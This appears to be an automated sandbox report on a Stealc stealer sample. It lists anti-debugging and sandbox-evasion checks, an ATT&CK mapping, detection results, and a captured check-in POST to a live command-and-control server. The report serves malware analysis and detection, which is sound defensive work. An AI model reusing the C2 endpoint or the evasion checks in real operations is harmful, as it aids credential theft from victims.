                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E23B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E1EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E11160 GetSystemInfo,ExitProcess,0_2_00E11160
                Source: file.exe, file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1391285301.0000000001AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.{Q0
                Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1391285301.0000000001AB4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwares
                Source: file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37571
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37517
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37520
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37538
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37531
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37405
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E14610 VirtualProtect ?,00000004,00000100,000000000_2_00E14610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29AA0 mov eax, dword ptr fs:[00000030h]0_2_00E29AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00E27690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E29790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00E298E0
                Source: file.exe, file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E575A8 cpuid 0_2_00E575A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E27D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00E26BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E279E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E27BC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem334
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsWin32.Trojan.Generic
                file.exe41%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                http://185.215.113.206/6c4adf523b719729.php17%VirustotalBrowse
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrueunknown
                http://185.215.113.206/true
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/6c4adf523b719729.php=6u2file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.215.113.206/6c4adf523b719729.php~file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://185.215.113.206/6c4adf523b719729.phplfile.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.215.113.206/6c4adf523b719729.php//file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.215.113.206/6c4adf523b719729.phpU5file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://185.215.113.206/6c4adf523b719729.phpq5file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://185.215.113.206file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmptrue
                                unknown
                                http://185.215.113.206/6c4adf523b719729.phpI5file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://185.215.113.206/&file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://185.215.113.206RGfile.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      unknownPortugal
                                      206894WHOLESALECONNECTIONSNLtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1543580
                                      Start date and time:2024-10-28 07:17:15 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 48s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 130
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      No context
                                      No context
                                      No created / dropped files found
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9602168961504365
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'185'728 bytes
                                      MD5:6fb5f961b07cc3d84be8823133c05c50
                                      SHA1:482608c2008a693ff1bad6ca205dec70ef67e370
                                      SHA256:b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488
                                      SHA512:c34d8fa310ef446890e2dcbe1eecece02ea1237ef37e37a58c6f089163fdb5a9cea7742432020a081f9cace35172b8609487e6518a0d2a31b9afb69757cccb49
                                      SSDEEP:49152:RzzJV3/ybsxM7qwOyeS/4bCum30nrNmJ4TH+XB:RzzD3/ybBtOyFd30rND
                                      TLSH:FEA53366CF99C30EE3365472E94AD6C49A9D83F7CD48EDE5A830107E31EF19426CB252
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0xb4b000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                      Instruction
                                      jmp 00007F8ED0ADEABAh
                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x2e70000x676005c109db2584be3871a71eb8c1c424cceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x2ea0000x2b50000x20039f76d026fea79a3b0ef1d69b6a634aaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      gaborkim0x59f0000x1ab0000x1aaa00854efea7f921044ae88682460cb0e5a7False0.994803874890126data7.953963790635809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      pqqqwztq0x74a0000x10000x4007059815595630f89a799de4c931b3f69False0.7431640625data5.963722945724209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x74b0000x30000x2200a7c959b4d06b94c31f80368efda46469False0.06204044117647059DOS executable (COM)0.652634244808355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      DLLImport
                                      kernel32.dlllstrcpy
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-28T07:18:28.265872+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749704185.215.113.20680TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2024 07:18:27.061790943 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:27.067307949 CET8049704185.215.113.206192.168.2.7
                                      Oct 28, 2024 07:18:27.067388058 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:27.068211079 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:27.073610067 CET8049704185.215.113.206192.168.2.7
                                      Oct 28, 2024 07:18:27.976746082 CET8049704185.215.113.206192.168.2.7
                                      Oct 28, 2024 07:18:27.976833105 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:27.979439020 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:27.984847069 CET8049704185.215.113.206192.168.2.7
                                      Oct 28, 2024 07:18:28.265805960 CET8049704185.215.113.206192.168.2.7
                                      Oct 28, 2024 07:18:28.265872002 CET4970480192.168.2.7185.215.113.206
                                      Oct 28, 2024 07:18:30.343728065 CET4970480192.168.2.7185.215.113.206
                                      • 185.215.113.206
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749704185.215.113.206807328C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 28, 2024 07:18:27.068211079 CET90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 28, 2024 07:18:27.976746082 CET203INHTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 06:18:27 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 28, 2024 07:18:27.979439020 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
                                      Host: 185.215.113.206
                                      Content-Length: 211
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 37 35 33 33 34 33 39 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a
                                      Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="hwid"A8A7533439EB3294564547------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="build"tale------DBFIEHDHIIIECAAKECFH--
                                      Oct 28, 2024 07:18:28.265805960 CET210INHTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 06:18:28 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Target ID:0
                                      Start time:02:18:23
                                      Start date:28/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0xe10000
                                      File size:2'185'728 bytes
                                      MD5 hash:6FB5F961B07CC3D84BE8823133C05C50
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:3.5%
                                        Total number of Nodes:1327
                                        Total number of Limit Nodes:24
